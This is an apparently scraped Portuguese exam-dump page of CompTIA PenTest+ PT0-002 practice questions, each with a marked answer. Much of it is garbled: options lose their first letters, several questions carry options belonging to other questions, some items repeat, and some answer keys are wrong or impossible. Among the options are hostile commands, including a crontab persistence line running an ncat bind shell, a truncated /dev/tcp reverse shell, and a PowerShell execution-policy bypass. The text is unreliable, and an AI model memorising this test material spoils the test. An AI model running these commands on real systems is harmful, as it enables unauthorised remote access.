NÃO QUER PERDER NADA?

Dicas para passar no exame de certificação

Últimas notícias sobre exames e informações sobre descontos

Curadoria e atualizada por nossos especialistas

Sim, me envie o boletim informativo

Atualizado CompTIA PenTest+ PT0-002 Exam Dumps - Seu caminho para o sucesso

Para a certificação CompTIA PenTest+ PT0-002, a utilização de recursos de exame confiáveis é fundamental para uma preparação completa do exame. O acesso a um vasto conjunto de perguntas e respostas precisas de testes práticos permite-lhe identificar lacunas de conhecimento e reforçar áreas de fraqueza. Materiais de estudo fiáveis, incluindo guias de estudo abrangentes e cursos em vídeo, fornecem explicações detalhadas dos conceitos de testes de penetração. Os exames de simulação que simulam o ambiente de teste real ajudam-no a familiarizar-se com o formato do exame e a gerir o tempo de forma eficaz. A prática regular com estes recursos de exame reforça a sua confiança e aumenta a sua capacidade de aplicar metodologias de testes de penetração durante o exame real. A combinação de materiais de estudo de alta qualidade, testes práticos e exames simulados equipa-o com as habilidades e conhecimentos necessários para passar no exame CompTIA PenTest+ PT0-002 com sucesso.
Faça outros exames online

Pergunta #1
Foi contratado um técnico de testes de penetração para analisar a segurança sem fios. O testador implantou um AP sem fio malicioso que imita a configuração do WiFi da empresa alvo. O testador de penetração agora quer tentar forçar as estações sem fio próximas a se conectarem ao AP malicioso. Qual das seguintes etapas o testador deve seguir PRÓXIMO?
A. Ver explicação abaixo
Ver resposta
Resposta correta: A
Pergunta #2
A desconfiança é necessária quando o teste de penetração:
A. Determina que as informações confidenciais estão a ser armazenadas em texto não criptografado
B. corre durante a verificação mensal de vulnerabilidades
C. escobre indicadores de comprometimento prévio ao longo da avaliação
D. rossegue em paralelo com uma investigação forense digital criminal
Ver resposta
Resposta correta: D
Pergunta #3
Uma empresa de software contratou um técnico de testes de penetração para efetuar um teste de penetração num servidor de base de dados. O testador recebeu uma variedade de ferramentas usadas pela política de privacidade da empresa. Qual das seguintes opções seria a MELHOR a utilizar para encontrar vulnerabilidades neste servidor?
A. OpenVAS
B. ikto
C. apa SQL
D. Nessus
Ver resposta
Resposta correta: C
Pergunta #4
Um técnico de testes de penetração tem oito horas úteis para obter acesso ao sistema financeiro de um cliente. Qual das seguintes técnicas terá a MAIOR probabilidade de sucesso?
A. Tentativa de seguir um empregado que se dirige ao local de trabalho do cliente
B. Deixar cair uma chave USB maliciosa com o logótipo da empresa no parque de estacionamento
C. Utilizar um ataque de força bruta contra o perímetro externo para ganhar terreno
D. Efetuar spear phishing contra empregados fazendo-se passar por gestores de topo
Ver resposta
Resposta correta: D
Pergunta #5
Uma empresa contratou uma equipa de testes de penetração para analisar os sistemas ciber-físicos de uma fábrica. A equipa descobriu imediatamente que os sistemas de supervisão e os PLCs estão ambos ligados à intranet da empresa. Qual das seguintes suposições, se feitas pela equipa de testes de penetração, é MAIS provável que seja válida?
A. Os autómatos não actuam sobre os comandos injectados através da rede
B. s supervisores e os controladores estão numa rede virtual separada por predefinição
C. Os controladores não validam a origem dos comandos
D. Os sistemas de supervisão detectarão uma injeção maliciosa de código/comandos
Ver resposta
Resposta correta: C
Pergunta #6
Um testador de penetração foi capaz de obter acesso a um sistema usando um exploit. A seguir, um trecho do código que foi utilizado: Qual dos seguintes comandos o testador de penetração deve executar após o engajamento?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ג€apacheג€ /F
Ver resposta
Resposta correta: B
Pergunta #7
Um técnico de testes de penetração, que está a fazer uma avaliação, descobre que um administrador tem andado a filtrar informação proprietária da empresa. O administrador oferece-se para pagar ao examinador para ficar calado. Qual das seguintes é a MELHOR ação a tomar pelo examinador?
A. Verificar o documento de definição do âmbito para determinar se a exfiltração está abrangida pelo âmbito
B. Parar o teste de penetração
C. Escalonar o problema
D. Incluir a descoberta e a interação no relatório diário
Ver resposta
Resposta correta: C
Pergunta #8
Qual das seguintes ferramentas seria MAIS útil para recolher informações sobre fornecedores e outras informações relevantes para a segurança de dispositivos IoT para apoiar o reconhecimento passivo?
A. hodan
B. Nmap
C. ebScarab-NG
D. Nessus
Ver resposta
Resposta correta: A
Pergunta #9
Uma empresa contratou um técnico de testes de penetração para implementar e configurar um ponto de acesso não autorizado na rede. Qual das seguintes é a MELHOR ferramenta a utilizar para atingir este objetivo?
A. Wireshark
B. ircrack-ng
C. ismet
D. ifite
Ver resposta
Resposta correta: B
Pergunta #10
Os resultados de um scan do Nmap são os seguintes:Qual das seguintes seria a MELHOR conclusão sobre este dispositivo?
A. larificar a declaração de trabalho
B. Obter um inventário de activos do cliente
C. ntrevistar todas as partes interessadas
D. Identificar todos os terceiros envolvidos
Ver resposta
Resposta correta: B
Pergunta #11
O seguinte trecho de código Python numerado por linha está sendo usado em reconhecimento: qual dos seguintes números de linha do script MAIS provavelmente contribuiu para que o script disparasse um alerta de `probable port scan` no IDS da organização?
A. inha 01
B. inha 02
C. inha 07
D. Linha 08
E. inha 12
Ver resposta
Resposta correta: A
Pergunta #12
Qual das seguintes é a vulnerabilidade MAIS comum associada aos dispositivos IoT que estão diretamente ligados à Internet?
A. Sistemas operativos não suportados
B. Suscetibilidade a ataques DDoS
C. Incapacidade de trabalhar em rede
D. A existência de palavras-passe predefinidas
Ver resposta
Resposta correta: D
Pergunta #13
Um técnico de testes de penetração estava a efetuar um teste de penetração e descobriu que o tráfego de rede já não estava a atingir o endereço IP do cliente. Mais tarde, o testador descobriu que o SOC tinha usado sinkholing no endereço IP do testador de penetração. Qual das seguintes opções MAIS provavelmente descreve o que aconteceu?
A. O técnico de testes de penetração estava a testar os activos errados
B. O processo de planeamento não garantiu que todas as equipas fossem notificadas
C. O cliente não estava preparado para iniciar a avaliação
D. O testador de penetração tinha informações de contacto incorrectas
Ver resposta
Resposta correta: B
Pergunta #14
Foi dada uma tarefa a um técnico de testes de penetração para atacar uma série de alvos no intervalo 192.168.1.0/24, accionando o menor número possível de alarmes e contramedidas. Qual das seguintes sintaxes de scan do Nmap seria a MELHOR para atingir este objetivo?
A. map -sT -vvv -O 192
B. map -sV 192
C. map -sA -v -O 192
D. map -sS -O 192
Ver resposta
Resposta correta: D
Pergunta #15
Durante um teste de penetração, um testador consegue alterar os valores no URL de example.com/login.php?id=5 para example.com/login.php?id=10 e obter acesso a uma aplicação Web. Qual das seguintes vulnerabilidades foi explorada pelo testador de penetração?
A. Injeção de comando
B. Autenticação deficiente
C. Referência direta ao objeto
D. Scripting entre sítios
Ver resposta
Resposta correta: C
Pergunta #16
Um técnico de testes de penetração física precisa de entrar no escritório de uma organização e recolher informações sensíveis sem agir de forma suspeita ou ser notado pelos guardas de segurança. O testador observou que a bilheteira da empresa não analisa os cartões e que os funcionários deixam os seus cartões em cima da mesa quando vão à casa de banho. Qual das seguintes técnicas o testador pode utilizar para obter acesso físico ao escritório? (Escolha duas.)
A. Clickjacking
B. equestro de sessão
C. Poluição por parâmetros
D. equestro de cookies
E. Scripting entre sítios
Ver resposta
Resposta correta: CD
Pergunta #17
Uma empresa de segurança está a discutir os resultados de um teste de penetração com o cliente. Com base nas conclusões, o cliente pretende concentrar o tempo restante num segmento de rede crítico. Qual das seguintes opções descreve MELHOR a ação que está a decorrer?
A. Maximizar a probabilidade de encontrar vulnerabilidades
B. Repriorizar as metas/objectivos
C. Eliminação da possibilidade de falsos positivos
D. Reduzir o risco para o ambiente do cliente
Ver resposta
Resposta correta: B
Pergunta #18
Qual dos seguintes métodos de avaliação é MAIS suscetível de causar danos a um ambiente ICS?
A. Farejar e depois decifrar o PIN WPS num dispositivo WiFi associado
B. espejar o livro de endereços do utilizador no dispositivo
C. uebrar uma ligação entre dois dispositivos Bluetooth
D. ransmitir mensagens de texto para o dispositivo
Ver resposta
Resposta correta: A
Pergunta #19
Qual das seguintes opções é MAIS importante incluir no relatório final de um teste estático de segurança de aplicações que foi escrito tendo como público-alvo uma equipa de programadores de aplicações?
A. Resumo executivo dos métodos de teste de penetração utilizados
B. Lista de materiais, incluindo fornecimentos, subcontratos e custos incorridos durante a avaliação
C. Avaliações quantitativas do impacto de um comprometimento bem sucedido de software
D. ontexto de código para instâncias de operações de typecasting inseguras
Ver resposta
Resposta correta: D
Pergunta #20
Um testador de penetração descobriu uma vulnerabilidade que fornece a capacidade de fazer upload para um caminho através da descoberta transversal. Alguns dos ficheiros que foram descobertos através desta vulnerabilidade são:Qual dos seguintes é o MELHOR método para ajudar um atacante a obter acesso interno à máquina afetada?
A. Editar o ficheiro descoberto com uma linha de código para a chamada de retorno remota
B. Descarregar ficheiros
C. ditar o ficheiro smb
D. Descarregar o ficheiro smb
Ver resposta
Resposta correta: C
Pergunta #21
Uma equipa vermelha obteve acesso à rede interna de um cliente durante um compromisso e utilizou a ferramenta Responder para recolher dados importantes
A. Apertos de mão múltiplos
B. Endereços IP
C. Transferências de ficheiros encriptados
D. Hashs de utilizador enviados através de SMB
Ver resposta
Resposta correta: D
Pergunta #22
HOTSPOT (Drag and Drop não é suportado)Você é um analista de segurança encarregado de fortalecer um servidor web. Foi-lhe dada uma lista de cargas HTTP que foram marcadas como maliciosas.INSTRUÇÃODadas as seguintes assinaturas de ataque, determine o tipo de ataque e, em seguida, identifique a correção associada para evitar o ataque no futuro.Se, em qualquer altura, quiser voltar ao estado inicial da simulação, clique no botão Repor tudo.Área de acesso:
A. Ver a secção Explicação para obter a resposta
Ver resposta
Resposta correta: A
Pergunta #23
Um testador de penetração precisa carregar os resultados de uma varredura de porta para uma ferramenta de segurança centralizada. Qual dos seguintes comandos permitiria que o testador salvasse os resultados num formato intercambiável?
A. map -iL resultados 192
B. map 192
C. map -A 192
D. map 192
Ver resposta
Resposta correta: C
Pergunta #24
Um testador de penetração pretende validar a eficácia de um produto DLP tentando a exfiltração de dados utilizando anexos de correio eletrónico. Qual das seguintes técnicas o testador deve selecionar para realizar esta tarefa?
A. Esteganografia
B. Remoção de metadados
C. Encriptação
D. odificar64
Ver resposta
Resposta correta: A
Pergunta #25
Um testador de penetração foi capaz de obter acesso a um sistema usando um exploit. A seguir, um trecho do código que foi utilizado: Qual dos seguintes comandos o testador de penetração deve executar após o engajamento?
A. rep -v apache ~/bash_history > ~/
B. m -rf /tmp/apache
C. hmod 600 /tmp/apache
D. askkill /IM ?€apache?€ /F
Ver resposta
Resposta correta: B
Pergunta #26
Qual dos seguintes comandos permitirá que um testador de penetração permita que um script de shell seja executado pelo proprietário do ficheiro?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
Ver resposta
Resposta correta: A
Pergunta #27
Um testador de penetração que está a efetuar uma avaliação de vulnerabilidades descobre que o ICMP está desativado num segmento de rede. Qual das seguintes opções poderia ser usada para um ataque de negação de serviço no segmento de rede?
A. Estrunfe
B. ing flood
C. raggle
D. Ping da morte
Ver resposta
Resposta correta: C
Pergunta #28
Qual das seguintes situações é a mais provável para justificar a revalidação de uma avaliação de segurança anterior?
A. Após a deteção de uma infração
B. Após uma fusão ou uma aquisição
C. Quando uma organização actualiza as suas configurações de firewall de rede
D. Quando a maioria das vulnerabilidades tiver sido corrigida
Ver resposta
Resposta correta: B
Pergunta #29
Um testador de penetração executou um comando ping `"A durante um teste de ambiente desconhecido, e ele retornou um pacote de 128 TTL. Qual dos sistemas operacionais a seguir MAIS provavelmente retornaria um pacote desse tipo?
A. Janelas
B. pple
C. inux
D. Android
Ver resposta
Resposta correta: A
Pergunta #30
Um técnico de testes de penetração executou os seguintes comandos num servidor Windows: Qual das seguintes acções deve o técnico de testes efetuar DEPOIS de entregar o relatório final?
A. liminar o trabalho de lote agendado
B. Fechar a ligação de inversão de marcha
C. Fazer downgrade das permissões de svsaccount
D. emover as credenciais criadas pelo testador
Ver resposta
Resposta correta: D
Pergunta #31
Um testador de penetração pretende testar uma lista de palavras-passe comuns contra o daemon SSH num dispositivo de rede. Qual das seguintes ferramentas seria a MELHOR para utilizar para este fim?
A. Hashcat
B. imikatz
C. atator
D. John, o Estripador
Ver resposta
Resposta correta: C
Pergunta #32
Uma nova empresa de segurança está a integrar o seu primeiro cliente. O cliente só permitiu testes durante o fim de semana e precisava dos resultados na segunda-feira de manhã. No entanto, a equipa de avaliação não conseguiu aceder ao ambiente, como previsto, até segunda-feira. Qual dos seguintes elementos a empresa de segurança deveria ter adquirido ANTES do início da avaliação?
A. Uma declaração de trabalho assinada
B. As contas de utilizador correctas e as respectivas palavras-passe
C. O prazo previsto para a avaliação
D. Os contactos de emergência adequados para o cliente
Ver resposta
Resposta correta: D
Pergunta #33
Durante um trabalho de teste de penetração, um consultor efectua o reconhecimento de um cliente para identificar potenciais alvos para uma campanha de phishing. Qual das seguintes opções permitiria ao consultor recuperar rapidamente os endereços de correio eletrónico dos contactos técnicos e de faturação, sem acionar qualquer uma das ferramentas de cibersegurança do cliente?(Escolha duas.)
A. OW
B. LA
C. OE
D. DA
Ver resposta
Resposta correta: BC
Pergunta #34
Um técnico de testes de penetração concluiu uma análise dos vários produtos de software produzidos pela empresa que está a ser avaliada. O testador descobriu que, nos últimos anos, a empresa tem incluído módulos vulneráveis de terceiros em vários produtos, embora a qualidade do código orgânico que está a ser desenvolvido seja muito boa. Qual das seguintes recomendações o testador de penetração deve incluir no relatório?
A. Adicionar um verificador de dependências à cadeia de ferramentas
B. Efetuar análises estáticas e dinâmicas de rotina do código autorizado
C. alidar as definições de segurança da API antes da implementação
D. Realizar testes de fuzz de binários compilados
Ver resposta
Resposta correta: A
Pergunta #35
Um scan Nmap de um switch de rede revela o seguinte:Qual dos seguintes controlos técnicos será provavelmente a PRIMEIRA recomendação para este dispositivo?
A. Palavras-passe encriptadas
B. Técnicas de endurecimento do sistema
C. Autenticação multifactor
D. Segmentação da rede
Ver resposta
Resposta correta: B
Pergunta #36
Um testador de penetração gostaria de obter credenciais de FTP implantando uma estação de trabalho como um ataque on-path entre o alvo e o servidor que tem o protocolo FTP. Qual dos métodos a seguir seria o MELHOR para atingir esse objetivo?
A. Aguardar o próximo início de sessão e efetuar um ataque de downgrade no servidor
B. apturar o tráfego utilizando o Wireshark
C. Efetuar um ataque de força bruta ao servidor
D. Utilizar uma exploração de FTP contra o servidor
Ver resposta
Resposta correta: B
Pergunta #37
É chamada a adição de valores de cadeia a outra cadeia:
A. ompilação
B. igação
C. oncatenação
D. onjunção
Ver resposta
Resposta correta: C
Pergunta #38
Um teste de penetração baseado na conformidade preocupa-se principalmente com
A. Obtenção de informações pessoais a partir da rede protegida
B. ontornar a proteção em dispositivos de extremidade
C. eterminar a eficácia de um conjunto específico de normas de segurança
D. bter informações específicas da rede protegida
Ver resposta
Resposta correta: C
Pergunta #39
Uma empresa contratou um técnico de testes de penetração para efetuar um teste de engenharia social aos seus empregados. Embora o técnico não tenha encontrado os números de telefone dos empregados no sítio Web da empresa, o técnico soube que o catálogo telefónico completo foi publicado há alguns meses. Em qual dos seguintes locais o técnico deve procurar PRIMEIRO os números dos empregados?
A. Arquivo Web
B. GitHub
C. Metadados do ficheiro
D. Fóruns subterrâneos
Ver resposta
Resposta correta: A
Pergunta #40
Uma empresa obteve permissão para uma análise de vulnerabilidades do seu fornecedor de serviços na nuvem e agora pretende testar a segurança dos seus dados alojados
A. c 10
B. owershell -exec bypass -f \\\\10
C. ash -i >& /dev/tcp/10
D. get 10
Ver resposta
Resposta correta: A
Pergunta #41
A realização de um teste de penetração num ambiente com dispositivos SCADA acarreta um risco de segurança adicional, uma vez que os dispositivos SCADA são utilizados para a realização de testes de penetração:
A. Os dispositivos produzem mais calor e consomem mais energia
B. s dispositivos são obsoletos e já não estão disponíveis para substituição
C. s protocolos são mais difíceis de compreender
D. s dispositivos podem causar efeitos no mundo físico
Ver resposta
Resposta correta: D
Pergunta #42
Um testador de penetração está a tentar descobrir rapidamente anfitriões activos numa sub-rede. Qual dos seguintes comandos executará uma verificação de ping?
A. map -sn 10
B. map -sV -A 10
C. map -Pn 10
D. map -sT -p- 10
Ver resposta
Resposta correta: A
Pergunta #43
Um técnico de testes de penetração estava a fazer força bruta num servidor Web interno e executou um comando que produziu o seguinte resultado: No entanto, quando o técnico de testes de penetração tentou navegar no URL http://172.16.100.10:3000/profile, foi apresentada uma página em branco. Qual das seguintes é a razão mais provável para a falta de resultado?
A. A porta HTTP não está aberta na firewall
B. O testador não executou sudo antes do comando
C. servidor Web está a utilizar HTTPS em vez de HTTP
D. Este URI devolveu um erro do servidor
Ver resposta
Resposta correta: D
Pergunta #44
Um técnico de testes de penetração descarregou um ficheiro de aplicação Java de um servidor Web comprometido e identifica a forma de o invocar observando o seguinte registo: Qual das seguintes é a ordem de passos que o técnico de testes de penetração tem de seguir para validar se a aplicação Java utiliza encriptação através de sockets?
A. Executar uma análise de vulnerabilidades da aplicação e, em seguida, identificar as portas TCP utilizadas pela aplicação
B. Executar a aplicação ligada a um depurador e, em seguida, analisar o registo da aplicação
C. Desmontar o código binário e depois identificar os pontos de rutura
D. niciar uma captura de pacotes com o Wireshark e, em seguida, executar a aplicação
Ver resposta
Resposta correta: D
Pergunta #45
Um testador de penetração encontra um script PHP utilizado por uma aplicação Web num repositório de código-fonte interno desprotegido. Depois de analisar o código, o verificador identifica o seguinte:Qual das seguintes combinações de ferramentas o verificador de penetração utilizaria para explorar este script?
A. Hidra e crocante
B. Netcat e cURL
C. urp Suite e DIRB
D. Nmap e OWASP ZAP
Ver resposta
Resposta correta: B
Pergunta #46
Um técnico de testes de penetração está a explicar a estrutura ATT&CK do MITRE ao consultor jurídico principal de uma empresa. Qual das seguintes opções o técnico de testes descreveria com maior probabilidade como um benefício da estrutura?
A. Compreender as tácticas de uma intrusão de segurança pode ajudar a interrompê-las
B. Os scripts que fazem parte da estrutura podem ser importados diretamente para as ferramentas SIEM
C. A metodologia pode ser utilizada para estimar melhor o custo de um incidente
D. A estrutura é estática e garante a estabilidade de um programa de segurança ao longo do tempo
Ver resposta
Resposta correta: A
Pergunta #47
Um técnico de testes de penetração foi contratado para efetuar uma avaliação da segurança física do escritório de uma organização. Depois de monitorizar o ambiente durante algumas horas, o técnico de testes de penetração repara que alguns funcionários vão almoçar a um restaurante próximo e deixam os seus pertences sem vigilância em cima da mesa enquanto comem. Qual das técnicas a seguir seria MAIS provável de ser usada para obter acesso legítimo ao prédio da organização sem gerar muitos alertas?
A. Tailgating
B. Mergulho em contentores de lixo
C. urf de ombro
D. Clonagem de crachás
Ver resposta
Resposta correta: D
Pergunta #48
Qual das seguintes opções descreve MELHOR o OWASP Top 10? (Escolha duas.)
A. Editar o ficheiro descoberto com uma linha de código para a chamada de retorno remota
B. Descarregar ficheiros
C. ditar o ficheiro smb
D. Descarregar o ficheiro smb
Ver resposta
Resposta correta: AC
Pergunta #49
Um técnico de testes de penetração obteve acesso ao correio eletrónico interno da empresa do diretor executivo (CEO). O objetivo seguinte é obter acesso à rede. Qual dos seguintes métodos terá mais probabilidades de funcionar?
A. Tentar obter a chave privada utilizada para S/MIME a partir da conta do CEO
B. Enviar uma mensagem de correio eletrónico da conta do CEO, solicitando uma nova conta
C. eslocar-se lateralmente do servidor de correio eletrónico para o controlador de domínio
D. Tentativa de aumentar os privilégios no servidor de correio eletrónico para obter acesso à raiz
Ver resposta
Resposta correta: D
Pergunta #50
Ao planear um esforço de teste de penetração, é importante expressar claramente as regras que envolvem a hora ideal do dia para a execução do teste, porque:
A. os regulamentos ou leis de conformidade de segurança podem ser violados
B. os testes podem tornar a deteção de um APT real mais difícil
C. Os testes aumentam a carga de trabalho das equipas defensivas de cibersegurança e de caça às ameaças
D. As operações comerciais e de rede podem ser afectadas
Ver resposta
Resposta correta: D
Pergunta #51
Ao planear um esforço de teste de penetração, é importante expressar claramente as regras que envolvem a hora ideal do dia para a execução do teste, porque:
A. s regulamentos ou leis de conformidade de segurança podem ser violados
B. s testes podem tornar a deteção de APT reais mais difícil
C. Os testes aumentam a carga de trabalho das equipas defensivas de cibersegurança e de caça às ameaças
D. s operações comerciais e de rede podem ser afectadas
Ver resposta
Resposta correta: D
Pergunta #52
Uma empresa de segurança foi contratada para efetuar um teste de penetração externa a uma empresa. A única informação que a empresa recebeu foi o nome da empresa. Qual das seguintes abordagens de reconhecimento passivo seria a MAIS provável para produzir resultados iniciais positivos?
A. Criar e enviar e-mails de phishing especialmente para os principais líderes da empresa
B. Executar uma análise de vulnerabilidades no sítio Web externo da empresa
C. empo de execução da cadeia de fornecedores/fornecimento da empresa
D. Recolher presenças na Web e sítios de redes sociais
Ver resposta
Resposta correta: D
Pergunta #53
Uma empresa recrutou um técnico de testes de penetração para efetuar uma análise de vulnerabilidades na rede. O teste é confirmado como sendo num ambiente conhecido. Qual das seguintes opções seria a MELHOR para identificar corretamente um sistema antes de realizar a avaliação?
A. Inventário de activos
B. egistos DNS
C. nálise de aplicações Web
D. Verificação completa
Ver resposta
Resposta correta: A
Pergunta #54
Um técnico de testes de penetração pretende analisar uma rede alvo sem ser detectado pelo IDS do cliente. Qual das seguintes análises tem MAIS probabilidades de evitar a deteção?
A. nviar quadros de desautenticação para as estações
B. Efetuar empastelamento em todos os canais de 2,4 GHz e 5 GHz
C. efinir o AP malicioso para transmitir dentro de canais de seleção de frequência dinâmica
D. Modificar a configuração do AP malicioso para não utilizar uma chave pré-partilhada
Ver resposta
Resposta correta: C
Pergunta #55
Um técnico de testes de penetração executou o seguinte comando num servidor de teste: python -m SimpleHTTPServer 9891Qual dos seguintes comandos pode ser utilizado para descarregar um ficheiro denominado exploit para uma máquina alvo para execução?
A. c 10
B. owershell -exec bypass -f \\10
C. ash -i >& /dev/tcp/10
D. get 10
Ver resposta
Resposta correta: D
Pergunta #56
Um testador de penetração capturou o seguinte tráfego durante um teste de aplicação web: Qual dos seguintes métodos o testador deve usar para visualizar as informações de autorização que estão sendo transmitidas?
A. escodificar o cabeçalho de autorização utilizando UTF-8
B. esencriptar o cabeçalho de autorização utilizando bcrypt
C. escodificar o cabeçalho de autorização utilizando Base64
D. esencriptar o cabeçalho de autorização utilizando AES
Ver resposta
Resposta correta: C
Pergunta #57
Um técnico de testes de penetração conseguiu obter acesso com êxito a uma estação de trabalho Windows no portátil de um cliente móvel. Qual das seguintes opções pode ser utilizada para garantir que o técnico de testes consegue manter o acesso ao sistema?
A. chtasks /create /sc /ONSTART /tr C:\\Temp|WindowsUpdate
B. mic startup get caption,command
C. rontab -l; echo ג€@reboot sleep 200 && ncat -lvp 4242 -e /bin/bashג€) | crontab 2>/dev/null
D. udo useradd -ou 0 -g 0 user
Ver resposta
Resposta correta: A
Pergunta #58
Qual das seguintes opções deve um técnico de testes de penetração fazer após identificar que uma aplicação que está a ser testada já foi comprometida com malware?
A. Analisar o malware para ver o que ele faz
B. Recolher as provas adequadas e depois remover o malware
C. Efetuar uma análise da causa raiz para descobrir como é que o malware entrou
D. emover o malware imediatamente
E. nterromper a avaliação e informar o contacto de emergência
Ver resposta
Resposta correta: E
Pergunta #59
Um Diretor de Segurança da Informação pretende avaliar a segurança da aplicação de comércio eletrónico da empresa. Qual das seguintes ferramentas deve ser a PRIMEIRA a ser utilizada por um técnico de testes de penetração para obter informações relevantes da aplicação sem acionar alarmes?
A. Mapa SQL
B. irBuster
C. 3af
D. OWASP ZAP
Ver resposta
Resposta correta: D
Pergunta #60
Um testador de penetração está a explorar o Web site de um cliente. O testador executa um comando curl e obtém o seguinte:Qual das seguintes ferramentas seria a MELHOR para o testador de penetração usar para explorar mais este site?
A. Conjunto de arrotos
B. irBuster
C. PScan
D. OWASP ZAP
Ver resposta
Resposta correta: C
Pergunta #61
Uma empresa contratou um técnico de testes de penetração para instalar e configurar um ponto de acesso não autorizado na rede. Qual das seguintes é a MELHOR ferramenta a utilizar para atingir este objetivo?
A. Wireshark
B. Fissura de ar
C. Kismet
D. Wifite
Ver resposta
Resposta correta: B
Pergunta #62
Uma empresa obteve autorização para uma análise de vulnerabilidades do seu fornecedor de serviços na nuvem e pretende agora testar a segurança dos seus dados alojados
A. Se os dados sensíveis do cliente estão acessíveis ao público
B. Se a ligação entre a nuvem e o cliente é segura
C. Se os empregados do cliente têm formação adequada para utilizar a plataforma
D. Se as aplicações na nuvem foram desenvolvidas utilizando um SDLC seguro
Ver resposta
Resposta correta: A
Pergunta #63
Um novo cliente contratou uma empresa de testes de penetração para um contrato de um mês para várias avaliações de segurança do novo serviço do cliente. O cliente espera disponibilizar publicamente o novo serviço pouco depois de a avaliação estar concluída e planeia corrigir quaisquer descobertas, exceto no caso de problemas críticos, depois de o serviço ser tornado público. O cliente pretende uma estrutura de relatório simples e não quer receber resultados diários. Qual das seguintes opções é a mais importante para o técnico de testes de penetração definir
A. stabelecer o formato exigido pelo cliente
B. Estabelecer o limiar de risco a transmitir imediatamente ao cliente
C. stabelecer o método dos potenciais falsos positivos
D. stabelecer o dia da semana preferido para a apresentação de relatórios
Ver resposta
Resposta correta: B
Pergunta #64
Um técnico de testes de penetração obteve os seguintes resultados depois de analisar um servidor Web utilizando o utilitário dirb: Qual dos seguintes elementos é MAIS suscetível de conter informações úteis para o técnico de testes de penetração?
A. ndex
B. obre
C. nfo
D. ome
Ver resposta
Resposta correta: B
Pergunta #65
Um técnico de testes de penetração preparou a seguinte mensagem de correio eletrónico de phishing para um teste de penetração futuro: Qual das seguintes opções o técnico de testes de penetração está a utilizar MAIS para influenciar os alvos de phishing a clicarem na ligação?
A. Familiaridade e semelhança
B. Autoridade e urgência
C. Escassez e medo
D. Prova social e ganância
Ver resposta
Resposta correta: B
Pergunta #66
As actividades de teste de penetração foram concluídas e os resultados iniciais foram revistos com o cliente. Qual das seguintes opções melhor descreve a PRÓXIMA etapa do compromisso?
A. Aceitação pelo cliente e assinatura do relatório final
B. Programação de acções de acompanhamento e de novos ensaios
C. Certificação dos resultados e entrega do relatório
D. Análise das lições aprendidas durante o compromisso
Ver resposta
Resposta correta: A
Pergunta #67
Um técnico de testes de penetração efectuou recentemente um ataque de engenharia social em que encontrou um funcionário da empresa alvo num café local e, ao longo do tempo, estabeleceu uma relação com o funcionário. No aniversário do funcionário, o testador deu-lhe um disco rígido externo como presente. Qual dos seguintes ataques de engenharia social o testador estava a utilizar?
A. Phishing
B. Tailgating
C. Isco
D. Surf de ombro
Ver resposta
Resposta correta: C
Pergunta #68
Uma empresa fica preocupada quando os alarmes de segurança são accionados durante um teste de penetração. Qual das seguintes opções deve a empresa fazer?
A. Interromper o teste de penetração
B. Conduzir uma resposta a um incidente
C. Desconfiar do testador de penetração
D. Assumir que o alerta é do teste de penetração
Ver resposta
Resposta correta: C
Pergunta #69
Um técnico de testes de penetração obtém acesso a um sistema e consegue migrar para um processo de utilizador: Tendo em conta o resultado acima, qual das seguintes acções o técnico de testes de penetração está a realizar? (Escolha duas.)
A. O examinador introduziu o endereço IP incorreto
B. O comando requer a opção "porta 135"
C. ão existe uma conta para RDP no servidor
D. O PowerShell requer privilégios administrativos
Ver resposta
Resposta correta: CD
Pergunta #70
Qual das seguintes expressões em Python aumenta uma variável val em um? (Escolha duas.)
A. map ג€"T3 192
B. map ג€"P0 192
C. map ג€"T0 192
D. map גA 192
Ver resposta
Resposta correta: CF
Pergunta #71
Um testador de penetração executa o comando unshadow numa máquina. Qual das seguintes ferramentas o testador utilizará mais provavelmente a seguir?
A. João, o Estripador
B. Hidra
C. Mimikatz
D. Caim e Abel
Ver resposta
Resposta correta: A
Pergunta #72
SIMULAÇÃOVocê é um técnico de testes de penetração que analisa o sítio Web de um cliente através de um navegador Web.INSTRUÇÕESAnalise todos os componentes do sítio Web através do navegador para determinar se existem vulnerabilidades.Corrija APENAS a vulnerabilidade mais elevada do certificado, da fonte ou dos cookies.Se, em qualquer altura, pretender voltar ao estado inicial da simulação, clique no botão Repor tudo.
A. Ver explicação abaixo
Ver resposta
Resposta correta: A
Pergunta #73
Um técnico de testes de penetração obteve acesso a um dispositivo de rede que tem um intervalo de IP desconhecido numa interface. Uma investigação mais aprofundada determina que se trata de um túnel VPN sempre ativo para um fornecedor terceiro. Qual das seguintes é a MELHOR ação a tomar pelo técnico de testes de penetração?
A. Utilizar o túnel como meio de ligação a outros dispositivos internos
B. Ignorar o intervalo de IP, uma vez que está fora do âmbito
C. nterromper a avaliação e informar o contacto de emergência
D. Examinar o intervalo de IPs em busca de sistemas adicionais para explorar
Ver resposta
Resposta correta: C
Pergunta #74
Uma empresa de software contratou um consultor de segurança para avaliar a segurança das práticas de desenvolvimento de software da empresa. O consultor opta por iniciar o reconhecimento realizando fuzzing num binário de software. Qual das seguintes vulnerabilidades é mais provável que o consultor de segurança identifique?
A. Sistemas de autenticação fracos
B. Credenciais armazenadas em cadeias de caracteres
C. Transbordos de memória (buffer overflows)
D. Gestão de recursos não optimizada
Ver resposta
Resposta correta: C
Pergunta #75
Qual dos seguintes comandos permitirá que um testador de penetração permita que um script de shell seja executado pelo proprietário do ficheiro?
A. hmod u+x script
B. hmod u+e script
C. hmod o+e script
D. hmod o+x script
Ver resposta
Resposta correta: A
Pergunta #76
Um técnico de testes de penetração descobre que um servidor Web que está dentro do âmbito do compromisso já foi comprometido com uma backdoor. Qual das seguintes acções deve o técnico de testes de penetração efetuar SEGUINTE?
A. Adquirir forensicamente o Trojan backdoor e efetuar a atribuição
B. Utilizar a porta traseira para apoiar o compromisso
C. rosseguir o compromisso e incluir a descoberta da porta traseira no relatório final
D. Informar imediatamente o cliente sobre a backdoor
Ver resposta
Resposta correta: D
Pergunta #77
Um testador de penetração descarregou o seguinte script Perl que pode ser utilizado para identificar vulnerabilidades em comutadores de rede. No entanto, o script não está a funcionar corretamente. Qual das seguintes alterações deve o testador aplicar para que o script funcione como pretendido?
A. Alterar a linha 2 para $ip= ג€10
B. emover as linhas 3, 5 e 6
C. emover a linha 6
D. ova todas as linhas abaixo da linha 7 para o topo do script
Ver resposta
Resposta correta: A
Pergunta #78
